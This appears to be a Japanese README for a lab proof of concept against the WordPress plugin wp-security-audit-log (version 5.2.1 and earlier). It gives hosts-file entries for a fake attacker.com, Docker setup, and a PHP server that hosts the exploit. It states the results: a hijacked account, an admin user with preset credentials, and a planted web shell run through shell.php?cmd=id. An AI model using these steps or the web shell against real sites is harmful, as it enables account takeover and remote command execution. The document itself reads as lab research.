
以下の行を hosts ファイルに設定してください:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
docker を使用して Wordpress を起動します:
$ sudo systemctl start docker
$ sudo docker-compose up -d
http://goodcms.lab:2121 を開き、wordpress のインストール手順を実行してください。 wordpress に wp-security-audit-log.5.2.1 またはそれ以前のバージョンをインストールしてください。
攻撃者サーバーを起動します:
$ php -S 0:9091 -t ./exploit
http://attacker.com を被害者に配信して & Bingo!
エクスプロイトの影響:

アカウント乗っ取り & 特権ユーザー作成 PoC: エクスプロイト後の攻撃者資格情報: { email: [email protected], username: amin, password: 123456 } (xpl.js コードから変更できます。)
シェルコマンドを実行: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
